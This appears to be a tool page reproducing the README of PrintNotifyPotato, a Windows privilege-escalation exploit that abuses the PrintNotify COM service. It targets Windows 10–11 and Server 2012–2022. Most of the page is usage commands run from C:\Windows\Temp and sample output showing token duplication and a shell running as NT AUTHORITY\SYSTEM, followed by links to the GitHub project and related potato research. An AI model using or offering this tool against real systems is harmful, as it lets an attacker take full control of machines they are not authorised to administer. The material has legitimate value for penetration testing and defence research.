Home

Awesome

PrintNotifyPotato

PrintNotifyPotato

Another potato, using PrintNotify COM service for lifting rights

For Windows 10 - 11 Windows Server 2012 - 2022

image

Usege


C:\Windows\Temp >PrintNotifyPotato.exe 

aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa    aaaaaaa     aaaaaaa    aaa   aaaa  
 aaaaaaaaaaa   aaaaaaaaa   aaaaaaaaa   aaa  aaaa   
 aaaaaaaaaaa  aaaa   aaa  aaaa   aaaa  aaa aaaa    
 aaaa    aaa         aaa  aaaa   aaaa  aaaaaaa     
 aaaa    aaa     aaaaaaa  aaa          aaaaaaa     
 aaaa    aaa   aaaaaaaaa  aaa          aaaaaaaa    
 aaaa    aaa  aaaa   aaa  aaa     aaa  aaaa aaa    
 aaaa    aaa  aaa   aaaa  aaaa   aaaa  aaa  aaaa   
 aaaa    aaa  aaa  aaaaa   aaaa  aaaa  aaa   aaaa  
 aaaa    aaa  aaaaaaaaaa    aaaaaaaa   aaa    aaa  
 aaaa    aaa    aaaa aaaa    aaaaa     aaa    aaaa 

Github: https://github.com/BeichenDream/PrintNotifyPotato

Example:
            PrintNotifyPotato.exe whoami
            PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe  whoami

[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >

Reference/Thanks

http://code.google.com/p/google-security-research/issues/detail?id=128

zcgonvh

https://github.com/antonioCoco/JuicyPotatoNG

https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/